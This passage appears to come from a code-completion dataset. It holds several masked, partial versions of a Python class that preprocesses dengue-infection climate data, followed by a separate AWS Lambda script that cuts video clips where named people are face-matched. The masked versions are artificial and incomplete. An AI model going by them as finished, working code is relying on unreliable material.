ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n <mask token>\n <mask token>\n <mask token>\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-2": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=\n FileTypes.TSV, development=development)\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n self.city()\n self.cyclic_encoder(col='weekofyear', max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n <mask token>\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n <mask token>\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n <mask token>\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n <mask 
token>\n <mask token>\n <mask token>\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-3": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=\n FileTypes.TSV, development=development)\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n self.city()\n self.cyclic_encoder(col='weekofyear', max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n\n def extract_month(self):\n self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])\n self.df['month'] = self.df['week_start_date'].dt.month\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n\n def ncep_dew_point_temp_k(self):\n \"\"\"\n dew point temperature in Kelvin degrees measured by NCEP CFSR;\n :rtype: object\n \"\"\"\n self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_dew_point_temp_c')\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n\n def 
ncep_precip_kg_per_m2(self):\n self.fill_nan(col='NCEP_precip_kg_per_m2')\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n <mask token>\n <mask token>\n\n def min_temp_c(self):\n self.fill_nan(col='min_temp_c')\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-4": "<mask token>\n\n\nclass DengueInfection(BasedDataset):\n\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=\n FileTypes.TSV, development=development)\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n self.city()\n self.cyclic_encoder(col='weekofyear', max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n self.df[col + '_no_nans'] = self.df[col]\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(\n f'year == \"{row[\\'year\\']}\" & month ==\"{row[\\'month\\']}\"'\n ).reset_index()\n city = row['city']\n value = query[city]\n if value.empty:\n value = self.df.loc[self.df['year'] == row['year']][col\n ].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n\n def extract_month(self):\n self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])\n self.df['month'] = self.df['week_start_date'].dt.month\n <mask token>\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if \n x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end=\n '20/06/' + year), 'summer': pd.date_range(start='21/06/' + year,\n end='22/09/' + year), 'autumn': pd.date_range(start='23/09/' +\n year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n <mask token>\n\n def week_of_year(self):\n pass\n <mask token>\n\n def six_month(self):\n self.df['six'] = self.df['month'].apply(lambda x: 1 if x > 6 else 0)\n\n def persiann_precip_mm(self):\n self.fill_nan(col='PERSIANN_precip_mm')\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda\n k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n\n def ncep_dew_point_temp_k(self):\n \"\"\"\n dew point temperature in Kelvin degrees measured by NCEP CFSR;\n :rtype: object\n \"\"\"\n self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_dew_point_temp_c')\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = 
self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n\n def ncep_precip_kg_per_m2(self):\n self.fill_nan(col='NCEP_precip_kg_per_m2')\n <mask token>\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'\n ].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n\n def diur_temp_rng_c(self):\n self.fill_nan(col='diur_temp_rng_c')\n <mask token>\n\n def min_temp_c(self):\n self.fill_nan(col='min_temp_c')\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n <mask token>\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n",
"step-5": "# Copyright (c) 2021, Omid Erfanmanesh, All rights reserved.\n\n\nimport math\n\nimport numpy as np\nimport pandas as pd\n\nfrom data.based.based_dataset import BasedDataset\nfrom data.based.file_types import FileTypes\n\n\nclass DengueInfection(BasedDataset):\n def __init__(self, cfg, development):\n super(DengueInfection, self).__init__(cfg=cfg, dataset_type=FileTypes.TSV, development=development)\n\n if development:\n self.total_cases()\n self.extract_month()\n self.extract_quarter()\n self.week_start_date()\n # self.six_month()\n # self.week_split()\n self.city()\n self.cyclic_encoder(col='weekofyear',max_val=53)\n self.cyclic_encoder(col='month', max_val=12)\n self.persiann_precip_mm()\n\n self.ncep_avg_temp_k()\n self.ncep_diur_temp_rng_k()\n self.ncep_max_air_temp_k()\n self.ncep_min_air_temp_k()\n self.ncep_air_temp_k()\n self.ncep_dew_point_temp_k()\n\n self.avg_temp_c()\n self.diur_temp_rng_c()\n self.max_temp_c()\n self.min_temp_c()\n self.precip_mm()\n\n\n\n def cyclic_encoder(self, col, max_val):\n self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)\n self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)\n return self.df\n\n def fill_nan(self, col):\n table = pd.pivot_table(self.df, values=col, index=['year', 'month'],\n columns=['city'], aggfunc=np.mean)\n\n self.df[col + '_no_nans'] = self.df[col]\n\n for index, row in self.df.iterrows():\n if math.isnan(row[col]):\n query = table.query(f'year == \"{row[\"year\"]}\" & month ==\"{row[\"month\"]}\"').reset_index()\n city = row['city']\n value = query[city]\n\n if value.empty:\n value = self.df.loc[self.df['year'] == row[\"year\"]][col].mean()\n self.df.loc[index, [col + '_no_nans']] = value\n continue\n self.df.loc[index, [col + '_no_nans']] = value[0]\n\n def extract_month(self):\n self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])\n self.df['month'] = self.df['week_start_date'].dt.month\n\n def extract_quarter(self):\n self.df['quarter'] = self.df['week_start_date'].dt.quarter\n\n def week_split(self):\n self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if x < 25 else 1)\n\n def season_of_date(date):\n year = str(date.year)\n seasons = {'spring': pd.date_range(start='21/03/' + year, end='20/06/' + year),\n 'summer': pd.date_range(start='21/06/' + year, end='22/09/' + year),\n 'autumn': pd.date_range(start='23/09/' + year, end='20/12/' + year)}\n if date in seasons['spring']:\n return 'spring'\n if date in seasons['summer']:\n return 'summer'\n if date in seasons['autumn']:\n return 'autumn'\n else:\n return 'winter'\n\n def kelvin_to_celsius(self, kelvin):\n if kelvin is None:\n return kelvin\n return kelvin - 273.15\n\n def year(self):\n pass\n\n def week_of_year(self):\n pass\n\n def week_start_date(self):\n pass\n\n def six_month(self):\n self.df['six'] = self.df['month'].apply(lambda x: 1 if x > 6 else 0)\n\n def persiann_precip_mm(self):\n self.fill_nan(col='PERSIANN_precip_mm')\n\n def ncep_air_temp_k(self):\n self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_air_temp_c')\n\n def ncep_avg_temp_k(self):\n self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_avg_temp_c')\n\n def ncep_dew_point_temp_k(self):\n \"\"\"\n dew point temperature in Kelvin degrees measured by NCEP CFSR;\n :rtype: object\n \"\"\"\n self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'].apply(\n lambda 
k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_dew_point_temp_c')\n\n def ncep_max_air_temp_k(self):\n self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_max_air_temp_c')\n\n def ncep_min_air_temp_k(self):\n self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_min_air_temp_c')\n\n def ncep_precip_kg_per_m2(self):\n self.fill_nan(col='NCEP_precip_kg_per_m2')\n\n def ncep_humidity_percent(self):\n self.fill_nan(col='NCEP_humidity_percent')\n\n def ncep_precip_mm(self):\n self.fill_nan(col='NCEP_precip_mm')\n\n def ncep_humidity_g_per_kg(self):\n self.fill_nan(col='NCEP_humidity_g_per_kg')\n\n def ncep_diur_temp_rng_k(self):\n self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'].apply(\n lambda k: self.kelvin_to_celsius(kelvin=k))\n self.fill_nan(col='NCEP_diur_temp_rng_c')\n\n def avg_temp_c(self):\n self.fill_nan(col='avg_temp_c')\n\n def diur_temp_rng_c(self):\n self.fill_nan(col='diur_temp_rng_c')\n\n def max_temp_c(self):\n self.fill_nan(col='max_temp_c')\n\n def min_temp_c(self):\n self.fill_nan(col='min_temp_c')\n\n def precip_mm(self):\n self.fill_nan(col='precip_mm')\n\n def total_cases(self):\n self.df = self.df[self.df['total_cases'] < 41]\n\n def city(self):\n self.df = self.df[self.df['city'] != 'sj']\n\n",
"step-ids": [
16,
18,
22,
25,
33
]
}
|
[
16,
18,
22,
25,
33
] |
import json
import boto3
import os
import datetime
regionName = os.environ['AWS_REGION']
BUCKET_PATH = os.environ['BUCKET_PATH']
SENSITIVIT = os.environ['SENSITIVIT']
s3_client = boto3.client('s3', region_name=regionName)
ddb_resource = boto3.resource('dynamodb', region_name=regionName)
def lambda_handler(event, context):
# body = json.loads(event['body'])
body = event
videoPath = str(body['videoPath'])
templatePath = str(body['templatePath'])
facePath = str(body['facePath'])
targetPeople = str(body['targetPeople'])
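    # facePath is an s3:// URI for the face-detection output JSON; its VideoMetadata /
    # Persons / FaceMatches layout matches Amazon Rekognition face search results.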
FACES_BUCKET = facePath.split('/')[2]
FACES_OBJECT = '/'.join(facePath.split('/')[3:])
s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')
    with open('/tmp/faces.json', 'r') as facesJson:
        facesData = json.load(facesJson)
FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])
PEOPLE = targetPeople.split(',')
timeStamps = []
scenesTime = []
i = 0
while i < len(facesData['Persons']):
try:
for target in PEOPLE:
if facesData['Persons'][i]['FaceMatches'] == []:
pass
elif facesData['Persons'][i]['FaceMatches'][0]['Face']['ExternalImageId'] == target.strip():
timeStamps.append(facesData['Persons'][i]['Timestamp'])
except IndexError:
pass
i = i+1
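    # Group the matched timestamps into scenes: consecutive detections no more than 1000 ms
    # apart are merged into one group (assumes at least one match was found above).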
timeCollection = [[timeStamps[0]]]
i = 1
j = 0
while i < len(timeStamps):
if timeStamps[i] - timeCollection[j][-1] <= 1000:
timeCollection[j].append(timeStamps[i])
i = i+1
else:
j = j+1
timeCollection.append([timeStamps[i]])
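    # Convert every group spanning at least one second into a MediaConvert-style HH:MM:SS:FF
    # timecode pair; the frame number FF is derived from the sub-second remainder of the
    # millisecond timestamp and the video frame rate.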
for collection in timeCollection:
if collection[-1] - collection[0] >= 1000:
if collection[0] % 1000 == 0:
start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime("%H:%M:%S") + ':00'
elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:
start = datetime.datetime.utcfromtimestamp(collection[0] // 1000).strftime("%H:%M:%S") + ':0' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))
else:
start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime("%H:%M:%S") + ':' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))
if collection[-1] % 1000 == 0:
end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime("%H:%M:%S") + ':00'
elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:
end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime("%H:%M:%S") + ':0' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))
else:
end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime("%H:%M:%S") + ':' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))
scenesTime.append((start,end))
else:
pass
JOB_BUCKET = templatePath.split('/')[2]
JOB_OBJECT = '/'.join(templatePath.split('/')[3:])
s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')
finalName = []
for people in PEOPLE:
finalName.append(people.strip())
OUTPUT_NAME = '-'+'-'.join(finalName)
with open('/tmp/job-template.json', 'r') as r:
template = json.load(r)
for scene in scenesTime:
template['Settings']['Inputs'][0]['InputClippings'].append({'StartTimecode': scene[0], 'EndTimecode': scene[-1]})
template['Settings']['Inputs'][0]['FileInput'] = videoPath
template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'] = OUTPUT_NAME
template['Settings']['OutputGroups'][0]['OutputGroupSettings']['FileGroupSettings']['Destination'] = BUCKET_PATH
with open('/tmp/job-all.json', 'w') as w:
json.dump(template, w, indent=2)
w.close()
r.close()
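    # MediaConvert needs an account-specific endpoint: look it up with describe_endpoints,
    # then recreate the client against that URL before submitting the job.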
mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)
response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')
mediaURL = response['Endpoints'][0]['Url']
mediaconvert_client = boto3.client('mediaconvert',endpoint_url=mediaURL)
with open("/tmp/job-all.json", "r") as jsonfile:
job_object = json.load(jsonfile)
mediaconvert_client.create_job(**job_object)
output = {'videoPath': videoPath,
'templatePath': templatePath,
'facePath': facePath,
'targetPerson': targetPeople,
'Frame Rate': FRAME_RATE
}
return {
'statusCode': 200,
'body': json.dumps(output)
}
|
normal
|
{
"blob_id": "8c96c38a67c2eb97e30b325e4917ba4888731118",
"index": 7349,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef lambda_handler(event, context):\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n PEOPLE = targetPeople.split(',')\n timeStamps = []\n scenesTime = []\n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face'][\n 'ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i + 1\n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i + 1\n else:\n j = j + 1\n timeCollection.append([timeStamps[i]])\n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':0' + str(int(collection[\n 0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':' + str(int(collection[0\n ] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':0' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start, end))\n else:\n pass\n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n OUTPUT_NAME = '-' + '-'.join(finalName)\n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({\n 'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'\n ] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings'][\n 'FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n mediaURL = response['Endpoints'][0]['Url']\n mediaconvert_client = boto3.client('mediaconvert', endpoint_url=mediaURL)\n with open('/tmp/job-all.json', 'r') as jsonfile:\n job_object = 
json.load(jsonfile)\n mediaconvert_client.create_job(**job_object)\n output = {'videoPath': videoPath, 'templatePath': templatePath,\n 'facePath': facePath, 'targetPerson': targetPeople, 'Frame Rate':\n FRAME_RATE}\n return {'statusCode': 200, 'body': json.dumps(output)}\n",
"step-3": "<mask token>\nregionName = os.environ['AWS_REGION']\nBUCKET_PATH = os.environ['BUCKET_PATH']\nSENSITIVIT = os.environ['SENSITIVIT']\ns3_client = boto3.client('s3', region_name=regionName)\nddb_resource = boto3.resource('dynamodb', region_name=regionName)\n\n\ndef lambda_handler(event, context):\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n PEOPLE = targetPeople.split(',')\n timeStamps = []\n scenesTime = []\n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face'][\n 'ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i + 1\n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i + 1\n else:\n j = j + 1\n timeCollection.append([timeStamps[i]])\n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':0' + str(int(collection[\n 0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':' + str(int(collection[0\n ] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':00'\n elif int(collection[-1] % 1000 / 